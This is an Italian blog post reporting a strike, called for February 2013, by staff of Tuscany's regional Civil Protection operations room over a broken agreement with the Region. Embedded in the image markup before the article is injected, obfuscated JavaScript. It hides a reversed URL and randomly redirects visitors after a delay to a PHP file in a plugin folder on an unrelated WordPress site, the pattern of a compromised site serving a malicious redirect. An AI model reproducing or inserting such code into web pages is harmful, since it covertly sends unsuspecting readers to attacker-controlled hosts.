La sala operativa della Protezione Civile in sciopero. La Regione non rispetta gli accordi

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2013/01/protcivile.jpg”>Riveviamo e volentieri pubblichiamo, con una domanda che resta in sospeso. Cosa succederà se accadrà un evento pericoloso per la cittadinanza nei momenti in cui i lavoratori della Sala operativa sono costretti a scioperare perché la Regione Toscana non rispetta ciò che essa stessa ha sottoscritto? Ci saranno le solite lacrime di coccodrillo del giorno dopo? (RC)

***

Proclamazione sciopero SOUP (Sala Operativa Unificata Permanente della Protezione civile regionale)

Oggi 21 gennaio la RSU ha proclamato lo sciopero di tutti i lavoratori, ROS e addetti della SOUP per i giorni 4/02/2013, 5/02/2013 e 6/02/2013 dalle ore 10:30 alle ore 12:30.

La motivazione dello sciopero è la non corretta applicazione da parte della Regione Toscana dell’accordo del 10/11/2011 relativo all’utilizzo delle economie realizzate attraverso la riduzione delle spese di funzionamento della SOUP. L’RSU e l’assemblea dei lavoratori SOUP si rivolgono a tutti i lavoratori al fine di condividere in maniera solidale le problematiche di questi lavoratori.

Sarà nostra cura aggiornare i lavoratori sull’evolversi della situazione.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *